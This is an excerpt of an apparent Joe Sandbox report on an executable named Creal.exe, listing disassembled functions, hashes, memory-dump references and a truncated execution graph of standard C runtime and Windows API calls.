                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                                        • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                        • Instruction ID: 336e5bcc35dd18355793422049d5200d224c31644277eac0c4ff4a3b8d0d3fb0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BD1FF72B28A818AF751CF65D6402BC37B1FB55B98B044236DE4E97B9DEE38D026C740
                                                                                                                                                                                                                                                        Function 00007FF6D92420C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                                                        • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                        • Instruction ID: 3b18c3a841597aeddf4163250779800b29def222440fb6ecafa15dd42e53f617
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F11A921A2C14242FA549FABEB4427D52A1EBAC780F445032DB4D87F9ACD6DD4A58A00
                                                                                                                                                                                                                                                        Function 00007FF6D924D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                        • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                        • Instruction ID: 63c344671a1aea072269ee4e48578cfd5f5c21c8497e14d6e710e585fad46c91
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4111C22B29B058AFB008F60E9552AD33A4FB59758F441E32DA6D96BA4DF78D164C380
                                                                                                                                                                                                                                                        Function 00007FF6D9265B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                        • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                                        • Instruction ID: 39bbdf2b0eb38380151156f89fcf2464a9df49616d8e3087d06b67cbabe84bd5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A412912A2878246FB648F65D60177E67A0EB80BA4F144236EE5C87ED9DF3CD461C740
                                                                                                                                                                                                                                                        Function 00007FF6D9259014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9259046
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A95E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A948: GetLastError.KERNEL32(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A968
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6D924CBA5), ref: 00007FF6D9259064
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                        • API String ID: 3580290477-3523861777
                                                                                                                                                                                                                                                        • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                                        • Instruction ID: e583fd4c3357485405a8a9802cc23a8eaaf7672e80791815359a50c27b51fb0d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43418436A2871286FB95DF25DA410BD67A4EF457D0B958037E94EC3B89DE3CE4A1C340
                                                                                                                                                                                                                                                        Function 00007FF6D925CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                        • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                        • Instruction ID: 9980edbc9dfa57efdf4825415ece5f402bd261f03fb844ff256926ece31e207c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B418232A29A4181EB60EF25E5443BD67A0FB99794F444136EA4DC7B98EF3CD451C740
                                                                                                                                                                                                                                                        Function 00007FF6D925F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                        • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                                        • Instruction ID: 06a3e248255f5f090e15e398a237d644ea87f8f56fb39155edf5bf4fe5a8bbe1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13212672B2828181FB60DF15D5842BD73B1FB88B44F854036DA9D83A98CF7CE955CB81
                                                                                                                                                                                                                                                        Function 00007FF6D924FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                        • Instruction ID: e5379774fd75c3765a574f05f5d53c9229a2cda932b6a0c4b78e0da53d758524
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58112E32618B8182EB618F15F94029E77E4FB98B84F584231DB8D47B54DF3CD561CB40
                                                                                                                                                                                                                                                        Function 00007FF6D926073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                        • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                        • Instruction ID: 9622afa5ae1f65600d053776e62f48f5adbb15b660c2d64dbc580dbef9987692
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3801A222A3C20386F761AF61A56527E63A0EF4A744F800037D54DC2A95DF3CE524DB54

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:9.5%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                        Total number of Limit Nodes:69
                                                                                                                                                                                                                                                        execution_graph 19526 7ff65e2aad69 19529 7ff65e295478 LeaveCriticalSection 19526->19529 15922 7ff65e299961 15934 7ff65e29a3d8 15922->15934 15939 7ff65e29b150 GetLastError 15934->15939 15940 7ff65e29b191 FlsSetValue 15939->15940 15941 7ff65e29b174 FlsGetValue 15939->15941 15943 7ff65e29b181 SetLastError 15940->15943 15944 7ff65e29b1a3 15940->15944 15942 7ff65e29b18b 15941->15942 15941->15943 15942->15940 15947 7ff65e29a3e1 15943->15947 15948 7ff65e29b21d 15943->15948 15970 7ff65e29eb98 15944->15970 15961 7ff65e29a504 15947->15961 15950 7ff65e29a504 __CxxCallCatchBlock 38 API calls 15948->15950 15953 7ff65e29b222 15950->15953 15951 7ff65e29b1d0 FlsSetValue 15955 7ff65e29b1ee 15951->15955 15956 7ff65e29b1dc FlsSetValue 15951->15956 15952 7ff65e29b1c0 FlsSetValue 15954 7ff65e29b1c9 15952->15954 15979 7ff65e29a948 15954->15979 15985 7ff65e29aef4 15955->15985 15956->15954 16033 7ff65e2a3650 15961->16033 15971 7ff65e29eba9 15970->15971 15978 7ff65e29ebb7 _get_daylight 15970->15978 15972 7ff65e29ebfa 15971->15972 15971->15978 15993 7ff65e294f08 15972->15993 15973 7ff65e29ebde HeapAlloc 15974 7ff65e29ebf8 15973->15974 15973->15978 15976 7ff65e29b1b2 15974->15976 15976->15951 15976->15952 15978->15972 15978->15973 15990 7ff65e2a3590 15978->15990 15980 7ff65e29a94d RtlFreeHeap 15979->15980 15984 7ff65e29a97c 15979->15984 15981 7ff65e29a968 GetLastError 15980->15981 15980->15984 15982 7ff65e29a975 __free_lconv_mon 15981->15982 15983 7ff65e294f08 _get_daylight 9 API calls 15982->15983 15983->15984 15984->15943 16019 7ff65e29adcc 15985->16019 15996 7ff65e2a35d0 15990->15996 16002 7ff65e29b2c8 GetLastError 15993->16002 15995 7ff65e294f11 15995->15976 16001 7ff65e2a02d8 EnterCriticalSection 15996->16001 16003 7ff65e29b309 FlsSetValue 16002->16003 16005 7ff65e29b2ec 16002->16005 16004 7ff65e29b31b 16003->16004 16016 7ff65e29b2f9 16003->16016 16007 7ff65e29eb98 _get_daylight 5 API calls 16004->16007 16005->16003 16005->16016 16006 7ff65e29b375 SetLastError 16006->15995 16008 7ff65e29b32a 16007->16008 16009 7ff65e29b348 FlsSetValue 16008->16009 16010 7ff65e29b338 FlsSetValue 16008->16010 16011 7ff65e29b354 FlsSetValue 16009->16011 16012 7ff65e29b366 16009->16012 16013 7ff65e29b341 16010->16013 16011->16013 16014 7ff65e29aef4 _get_daylight 5 API calls 16012->16014 16015 7ff65e29a948 __free_lconv_mon 5 API calls 16013->16015 16017 7ff65e29b36e 16014->16017 16015->16016 16016->16006 16018 7ff65e29a948 __free_lconv_mon 5 API calls 16017->16018 16018->16006 16031 7ff65e2a02d8 EnterCriticalSection 16019->16031 16067 7ff65e2a3608 16033->16067 16072 7ff65e2a02d8 EnterCriticalSection 16067->16072 16137 7ff65e28bae0 16138 7ff65e28bb0e 16137->16138 16139 7ff65e28baf5 16137->16139 16139->16138 16142 7ff65e29d5fc 16139->16142 16143 7ff65e29d647 16142->16143 16147 7ff65e29d60b _get_daylight 16142->16147 16144 7ff65e294f08 _get_daylight 11 API calls 16143->16144 16146 7ff65e28bb6e 16144->16146 16145 7ff65e29d62e HeapAlloc 16145->16146 16145->16147 16147->16143 16147->16145 16148 7ff65e2a3590 _get_daylight 2 API calls 16147->16148 16148->16147 19759 7ff65e2aabe3 19760 7ff65e2aabf3 19759->19760 19763 7ff65e295478 LeaveCriticalSection 19760->19763 19566 7ff65e28cb50 19567 7ff65e28cb60 19566->19567 19583 7ff65e299ba8 19567->19583 19569 7ff65e28cb6c 19589 7ff65e28ce48 19569->19589 19571 7ff65e28d12c 7 API calls 19573 7ff65e28cc05 19571->19573 19572 7ff65e28cb84 _RTC_Initialize 19581 7ff65e28cbd9 19572->19581 19594 7ff65e28cff8 19572->19594 19575 7ff65e28cb99 19597 7ff65e299014 19575->19597 19581->19571 19582 7ff65e28cbf5 19581->19582 19584 7ff65e299bb9 19583->19584 19585 7ff65e299bc1 19584->19585 19586 7ff65e294f08 _get_daylight 11 API calls 19584->19586 19585->19569 19587 7ff65e299bd0 19586->19587 19588 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 19587->19588 19588->19585 19590 7ff65e28ce59 19589->19590 19593 7ff65e28ce5e __scrt_release_startup_lock 19589->19593 19591 7ff65e28d12c 7 API calls 19590->19591 19590->19593 19592 7ff65e28ced2 19591->19592 19593->19572 19622 7ff65e28cfbc 19594->19622 19596 7ff65e28d001 19596->19575 19598 7ff65e299034 19597->19598 19620 7ff65e28cba5 19597->19620 19599 7ff65e299052 GetModuleFileNameW 19598->19599 19600 7ff65e29903c 19598->19600 19604 7ff65e29907d 19599->19604 19601 7ff65e294f08 _get_daylight 11 API calls 19600->19601 19602 7ff65e299041 19601->19602 19603 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 19602->19603 19603->19620 19637 7ff65e298fb4 19604->19637 19607 7ff65e2990c5 19608 7ff65e294f08 _get_daylight 11 API calls 19607->19608 19609 7ff65e2990ca 19608->19609 19610 7ff65e29a948 __free_lconv_mon 11 API calls 19609->19610 19610->19620 19611 7ff65e2990ff 19613 7ff65e29a948 __free_lconv_mon 11 API calls 19611->19613 19612 7ff65e2990dd 19612->19611 19614 7ff65e299144 19612->19614 19615 7ff65e29912b 19612->19615 19613->19620 19618 7ff65e29a948 __free_lconv_mon 11 API calls 19614->19618 19616 7ff65e29a948 __free_lconv_mon 11 API calls 19615->19616 19617 7ff65e299134 19616->19617 19619 7ff65e29a948 __free_lconv_mon 11 API calls 19617->19619 19618->19611 19619->19620 19620->19581 19621 7ff65e28d0cc InitializeSListHead 19620->19621 19623 7ff65e28cfcf 19622->19623 19624 7ff65e28cfd6 19622->19624 19623->19596 19626 7ff65e29a1ec 19624->19626 19629 7ff65e299e28 19626->19629 19636 7ff65e2a02d8 EnterCriticalSection 19629->19636 19638 7ff65e299004 19637->19638 19639 7ff65e298fcc 19637->19639 19638->19607 19638->19612 19639->19638 19640 7ff65e29eb98 _get_daylight 11 API calls 19639->19640 19641 7ff65e298ffa 19640->19641 19642 7ff65e29a948 __free_lconv_mon 11 API calls 19641->19642 19642->19638 19646 7ff65e299d50 19649 7ff65e299ccc 19646->19649 19656 7ff65e2a02d8 EnterCriticalSection 19649->19656 19832 7ff65e29afd0 19833 7ff65e29afd5 19832->19833 19837 7ff65e29afea 19832->19837 19838 7ff65e29aff0 19833->19838 19839 7ff65e29b03a 19838->19839 19840 7ff65e29b032 19838->19840 19842 7ff65e29a948 __free_lconv_mon 11 API calls 19839->19842 19841 7ff65e29a948 __free_lconv_mon 11 API calls 19840->19841 19841->19839 19843 7ff65e29b047 19842->19843 19844 7ff65e29a948 __free_lconv_mon 11 API calls 19843->19844 19845 7ff65e29b054 19844->19845 19846 7ff65e29a948 __free_lconv_mon 11 API calls 19845->19846 19847 7ff65e29b061 19846->19847 19848 7ff65e29a948 __free_lconv_mon 11 API calls 19847->19848 19849 7ff65e29b06e 19848->19849 19850 7ff65e29a948 __free_lconv_mon 11 API calls 19849->19850 19851 7ff65e29b07b 19850->19851 19852 7ff65e29a948 __free_lconv_mon 11 API calls 19851->19852 19853 7ff65e29b088 19852->19853 19854 7ff65e29a948 __free_lconv_mon 11 API calls 19853->19854 19855 7ff65e29b095 19854->19855 19856 7ff65e29a948 __free_lconv_mon 11 API calls 19855->19856 19857 7ff65e29b0a5 19856->19857 19858 7ff65e29a948 __free_lconv_mon 11 API calls 19857->19858 19859 7ff65e29b0b5 19858->19859 19864 7ff65e29ae94 19859->19864 19878 7ff65e2a02d8 EnterCriticalSection 19864->19878 16396 7ff65e2a08c8 16397 7ff65e2a08ec 16396->16397 16399 7ff65e2a08fc 16396->16399 16398 7ff65e294f08 _get_daylight 11 API calls 16397->16398 16417 7ff65e2a08f1 16398->16417 16400 7ff65e2a0bdc 16399->16400 16401 7ff65e2a091e 16399->16401 16402 7ff65e294f08 _get_daylight 11 API calls 16400->16402 16403 7ff65e2a093f 16401->16403 16545 7ff65e2a0f84 16401->16545 16404 7ff65e2a0be1 16402->16404 16407 7ff65e2a09b1 16403->16407 16409 7ff65e2a0965 16403->16409 16413 7ff65e2a09a5 16403->16413 16406 7ff65e29a948 __free_lconv_mon 11 API calls 16404->16406 16406->16417 16411 7ff65e29eb98 _get_daylight 11 API calls 16407->16411 16427 7ff65e2a0974 16407->16427 16408 7ff65e2a0a5e 16421 7ff65e2a0a7b 16408->16421 16428 7ff65e2a0acd 16408->16428 16560 7ff65e2996c0 16409->16560 16414 7ff65e2a09c7 16411->16414 16413->16408 16413->16427 16566 7ff65e2a712c 16413->16566 16418 7ff65e29a948 __free_lconv_mon 11 API calls 16414->16418 16416 7ff65e29a948 __free_lconv_mon 11 API calls 16416->16417 16423 7ff65e2a09d5 16418->16423 16419 7ff65e2a096f 16424 7ff65e294f08 _get_daylight 11 API calls 16419->16424 16420 7ff65e2a098d 16420->16413 16426 7ff65e2a0f84 45 API calls 16420->16426 16422 7ff65e29a948 __free_lconv_mon 11 API calls 16421->16422 16425 7ff65e2a0a84 16422->16425 16423->16413 16423->16427 16431 7ff65e29eb98 _get_daylight 11 API calls 16423->16431 16424->16427 16437 7ff65e2a0a89 16425->16437 16602 7ff65e2a33dc 16425->16602 16426->16413 16427->16416 16428->16427 16429 7ff65e2a33dc 40 API calls 16428->16429 16430 7ff65e2a0b0a 16429->16430 16432 7ff65e29a948 __free_lconv_mon 11 API calls 16430->16432 16434 7ff65e2a09f7 16431->16434 16435 7ff65e2a0b14 16432->16435 16439 7ff65e29a948 __free_lconv_mon 11 API calls 16434->16439 16435->16427 16435->16437 16436 7ff65e2a0bd0 16440 7ff65e29a948 __free_lconv_mon 11 API calls 16436->16440 16437->16436 16442 7ff65e29eb98 _get_daylight 11 API calls 16437->16442 16438 7ff65e2a0ab5 16441 7ff65e29a948 __free_lconv_mon 11 API calls 16438->16441 16439->16413 16440->16417 16441->16437 16443 7ff65e2a0b58 16442->16443 16444 7ff65e2a0b60 16443->16444 16445 7ff65e2a0b69 16443->16445 16447 